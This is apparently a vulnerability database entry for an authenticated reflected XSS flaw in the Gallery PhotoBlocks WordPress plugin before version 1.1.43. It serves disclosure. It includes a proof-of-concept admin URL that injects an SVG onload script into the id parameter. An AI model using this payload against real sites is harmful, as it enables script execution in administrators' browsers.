Lucene search

K
wpexploitWpvulndbWPEX-ID:B8D1D88E-F2E5-4212-AF34-C91F563F07B6
HistoryJul 09, 2019 - 12:00 a.m.

Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS

2019-07-0900:00:00
wpvulndb
6

0.001 Low

EPSS

Percentile

50.9%

The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.

When logged in with an account with administrator capabilities: https://<BLOG>/wp-admin/admin.php?page=photoblocks-edit&id="><svg/onload=alert(/XSS/)>

0.001 Low

EPSS

Percentile

50.9%

Related for WPEX-ID:B8D1D88E-F2E5-4212-AF34-C91F563F07B6